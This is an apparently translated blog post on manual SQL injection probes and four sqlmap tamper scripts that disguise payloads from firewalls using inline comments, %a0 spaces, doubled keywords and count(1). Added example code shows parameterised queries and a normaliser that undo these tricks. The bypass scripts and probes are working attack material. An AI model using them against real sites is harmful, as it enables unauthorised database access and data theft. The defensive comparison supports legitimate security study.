Manual SQL injection and sqlmap bypasses
2021-08-18 16:15:20

Manual injection

Basics

test: and 1 = 1, and 1 = 2

Determining whether SQL injection exists

1. Append a ' after the id value and look at the returned data.

2. and (select count(*) from sysobjects)>0

Variants: and user>0      and database>0

SQL injection comes in three types: numeric, string and search.

Guessing table names

(Select Count(*) from <table-name-to-guess>)>=0

Guessing column names

(Select Count(<column-name-to-guess>) from <known-table>)>=0

Guessing records

and (Select Count(<known-column>) from <known-table>)>n, where n is a number you vary
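As an added illustration of why the true/false probes above work and what stops them (this is example code, not part of the original post), the following runs the post's "and 1=1" / "and 1=2" and "'" probes against a constructed in-memory SQLite table, once through string concatenation and once through a bound parameter. The table, its rows and the use of sqlite_master as the always-present schema table (the role sysobjects plays on MSSQL in the post) are all assumptions of the example.

```python
# Added example (not from the original post): the post's probes against a
# constructed SQLite table, through a vulnerable and a hardened lookup.
import sqlite3


def make_db():
    # Constructed sample data. sqlite_master is SQLite's schema table and plays
    # the role the post's sysobjects probe plays on MSSQL.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", [(1, "first"), (2, "second")])
    return conn


def lookup_concat(conn, raw_id):
    """Vulnerable pattern: the request value is pasted into the SQL text, so
    whatever follows the number is parsed as SQL. Returns the titles found; a
    syntax error (the "'" probe) surfaces as sqlite3.OperationalError."""
    rows = conn.execute("SELECT title FROM news WHERE id = " + raw_id).fetchall()
    return [title for (title,) in rows]


def lookup_param(conn, raw_id):
    """Hardened pattern: validate the type, then bind the value. The database
    never sees the request value as SQL, so the probes change nothing.
    Returns None when the value is not an integer."""
    try:
        id_val = int(raw_id)
    except ValueError:
        return None
    rows = conn.execute("SELECT title FROM news WHERE id = ?", (id_val,)).fetchall()
    return [title for (title,) in rows]


def probe_differential(lookup, conn, base_id="1"):
    """Run the post's true/false pair and report whether the two responses
    differ, which is the signal the manual test looks for."""
    try:
        true_rows = lookup(conn, base_id + " and 1=1")
        false_rows = lookup(conn, base_id + " and 1=2")
    except sqlite3.OperationalError:
        return "error"
    return "differs" if true_rows != false_rows else "same"


def quote_probe_errors(lookup, conn, base_id="1"):
    """The post's first probe: append a single quote. True if the database
    rejected the statement, i.e. the quote reached the SQL parser."""
    try:
        lookup(conn, base_id + "'")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("concat:", probe_differential(lookup_concat, db), quote_probe_errors(lookup_concat, db))
    print("param: ", probe_differential(lookup_param, db), quote_probe_errors(lookup_param, db))
```

With concatenation the true/false pair returns different row sets and the quote probe raises a database error, which is exactly what the manual test looks for; with a bound parameter and type validation both probes are rejected before any SQL runs, so there is nothing to observe.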

..............................................

sqlmap bypass (tamper) scripts

Here I'll just post the code; I can't be bothered to explain it. Oh, and don't forget to create an __init__.py.

#!/usr/bin/env python
# Tamper script: wraps keywords and separators in MySQL inline comments (/*!...*/)

from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    if payload:
        # Plain string replacements, applied in this order
        payload = payload.replace("UNION", "union/*!88888cas*/")
        payload = payload.replace("--", "/*!*/--")
        payload = payload.replace("SELECT", "/*!88888cas*/select")
        payload = payload.replace("FROM", "/*!99999c*//*!99999c*/from")
        payload = payload.replace("#", "/*!*/#")
        payload = payload.replace("USER()", "USER/*!()*/")
        payload = payload.replace("DATABASE()", "DATABASE/*!()*/")
        payload = payload.replace(" ", "/*!*/")
        payload = payload.replace("=", "/*!*/=/*!*/")
        payload = payload.replace("AND", "/*!*/AND/*!*/")

    return payload

It's just string replacement; no need for me to explain further, right?

#!/usr/bin/env python
# -*- coding:UTF-8 -*-

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def dependencies():
    pass


def tamper(payload, **kwargs):
    # Based on sqlmap's space2plus: replaces spaces outside quotes with %a0

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    # Just change the original + to %a0
                    retVal += "%a0"
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                # Just change the original + to %a0
                retVal += "%a0"
                continue

            retVal += payload[i]

    return retVal

Hahaha

#!/usr/bin/env python
# -*- coding:UTF-8 -*-

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# Import the regex module, used for the character substitutions below
import re
# PRIORITY levels from sqlmap's lib/core/enums
from lib.core.enums import PRIORITY
# Define the script priority
__priority__ = PRIORITY.NORMAL

# Dependency hook (unused here)
def dependencies():
    pass

def tamper(payload, **kwargs):
    # Keep a copy of the payload
    retVal = payload
    if payload:
        # Use re.sub to replace "and" and "or" case-insensitively
        # with "anandd" and "oorr"
        retVal = re.sub(r"(?i)(or)", r"oorr", retVal)
        retVal = re.sub(r"(?i)(and)", r"anandd", retVal)
    # Return the modified payload
    return retVal

Boom boom boom

#!/usr/bin/env python
# -*- coding:UTF-8 -*-
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload
    if payload:
        # Replace count(*) with count(1), case-insensitively
        retVal = re.sub(r"(?i)count\(\*\)", r"count(1)", payload)

    return retVal
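From the defender's side, every one of the four scripts above relies on a filter that matches the raw request string rather than the form the database will actually parse. The following is an added example (not sqlmap code and not from the original post) of a normaliser that undoes those obfuscations before keyword matching, together with a comparison of three filter policies against the anandd/oorr trick: deleting a keyword once, deleting until nothing changes, and rejecting the request outright. The assumed backend version (MySQL 8.0, so /*!NNNNN ...*/ executes only when NNNNN <= 80000), the sample payloads and the keyword list are all constructed for the example.

```python
# Added example (not from the post, not sqlmap code): a defender-side normaliser
# for the obfuscations the tamper scripts above produce, plus filter policies.
import re
from urllib.parse import unquote

# Assumption: backend is MySQL 8.0.x, so a versioned comment /*!NNNNN ...*/ is
# executed when NNNNN <= 80000 and skipped otherwise.
ASSUMED_MYSQL_VERSION = 80000

# Constructed samples (not captured traffic): a payload in the style of the first
# tamper script's output, and one using %a0 as the whitespace substitute.
SAMPLE_INLINE_COMMENTS = (
    "1/*!*/AND/*!*/1/*!*/=/*!*/1/*!*/union/*!88888cas*//*!*//*!88888cas*/select/*!*/USER/*!()*/"
)
SAMPLE_A0_SPACES = "1%a0AND%a01=1"

VERSIONED_COMMENT = re.compile(r"/\*!(\d{5})?(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Tokens that have no business in a numeric id parameter; USER/DATABASE only as calls.
SUSPICIOUS = re.compile(r"\b(?:UNION|SELECT|FROM|AND|OR)\b|\b(?:USER|DATABASE)(?=\s*\()")


def _expand_versioned(match):
    version, inner = match.group(1), match.group(2)
    if version is None or int(version) <= ASSUMED_MYSQL_VERSION:
        return " " + inner + " "   # MySQL executes the body; keep it, comment acts as separator
    return " "                     # version in the future: MySQL skips it, so do we


def normalize(raw):
    """Percent-decode, expand or drop inline comments, fold all Unicode whitespace
    (including U+00A0 from %a0) to single spaces, and uppercase."""
    s = unquote(raw, encoding="latin-1")   # %a0 -> "\xa0" instead of a replacement char
    s = VERSIONED_COMMENT.sub(_expand_versioned, s)
    s = PLAIN_COMMENT.sub(" ", s)
    s = re.sub(r"\s+", " ", s).strip()
    return s.upper()


def suspicious_tokens(raw):
    """Keywords found after normalisation, in order of appearance."""
    return SUSPICIOUS.findall(normalize(raw))


def strip_once(value):
    """The weak filter the anandd/oorr script targets: delete each keyword once."""
    return re.sub(r"(?i)and|or", "", value)


def strip_to_fixpoint(value):
    """Re-apply the deletion until nothing changes; "anandd" collapses to ""."""
    previous = None
    while previous != value:
        previous, value = value, strip_once(value)
    return value


def decide(raw):
    """Reject-not-rewrite policy on the normalised form: "allow" or "reject"."""
    return "reject" if suspicious_tokens(raw) else "allow"


if __name__ == "__main__":
    for sample in (SAMPLE_INLINE_COMMENTS, SAMPLE_A0_SPACES, "42"):
        print(repr(normalize(sample)), suspicious_tokens(sample), decide(sample))
    print(strip_once("anandd"), "|", strip_to_fixpoint("anandd"))
```

The normaliser has to follow the backend parser's rules, not the HTTP layer's: which versioned comments execute depends on the real server version, and %a0 only matters because the database treats that byte as whitespace. Note also that strip_once turns "anandd" back into "and", which is the whole point of that tamper script; stripping to a fixpoint removes it, but rejecting the request on the normalised form is the policy that does not hand the attacker a rewriting oracle at all.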

*Solemn statement: this article is limited to technical discussion and sharing; using it for illegal purposes is strictly prohibited.

Otherwise you'll end up like me...

Hahahahahahahahaha

OK, that's it for today. I'm 铁汉fhoenix. I hope today's content was helpful to you; goodbye.

# SQL injection # SqlMap # SQL injection techniques # sqlmap tutorial # SQL injection WAF bypass